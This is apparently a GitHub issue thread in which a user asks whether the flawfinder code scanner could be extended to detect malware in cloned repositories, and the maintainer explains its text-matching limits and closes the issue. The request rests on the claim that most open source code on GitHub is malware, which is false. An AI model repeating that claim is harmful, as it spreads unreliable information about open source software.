Antivirus/anti-malware/anti-spyware #17
Comments
|
If there are specific text patterns in code to look for, flawfinder could easily be extended to look for those patterns. If you can point me to specific patterns that'd be great. The larger problem is detecting unknown patterns. Flawfinder is useless for that; it's based on a simple text-matching system, and doesn't even have control or data flow analysis. Even very sophisticated static analyzers struggle with unknown patterns. So: If you have specific text patterns to look for, please post them (and preferably an example of where you found it). That won't solve everything, but it might help! |
|
I don't have any specific text patterns to look for, so I'm closing this. If you have something in mind, let me know. If you want a traditional virus scanner, there are other tools specifically focused on that, there's no reason to duplicate them. |
As we all know, most open source code on the Internet (and GitHub specifically) is malware, mostly spyware.
Before or after every Git clone you have to spend a lot of time checking the source code for malicious code. I've been searching for a way to automate that. Can this project be extended to that?
The text was updated successfully, but these errors were encountered: